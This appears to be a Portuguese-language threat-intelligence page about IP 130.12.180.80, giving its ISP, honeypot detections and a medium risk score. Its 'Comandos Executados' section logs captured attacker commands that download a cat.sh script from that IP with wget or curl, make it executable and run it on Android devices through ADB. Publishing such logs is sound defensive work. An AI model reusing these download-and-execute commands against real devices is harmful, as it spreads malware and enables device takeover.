Ameaca AtivaMEDIO

130.12.180.80

Primeira Deteccao16/01/2026
Ultima Atividade16/01/2026
ISPRailnet LLC
🎯
593
Ataques Totais
🔌
3
Portas
📡
3
Tipos de Ataque
🦠
0
Malware

Geolocalizacao

Pais
🇺🇸 Estados Unidos
Cidade
Desconhecida
ASN
AS214943
ISP
Railnet LLC

Tipos de Ataque

honeyaml
adbhoney
honeytrap

Portas Atacadas

8055555556

Malware Associado

Sem malware associado

Comandos Executados

$cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android101x
$cd /data/local/tmp; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android52x
$echo hello18x
$cd /data/local; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android10x
$cd /data/local/tmp; rm -rf *; wget http://130.12.180.80/cat.sh || curl http://45.67.138.196/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android3x

Avaliacao de Risco

50
/100
BaixoMedioAltoCritico
IP 130.12.180.80 - Ameaca Detectada | TroyanosYVirus.com | TroyanosYVirus.com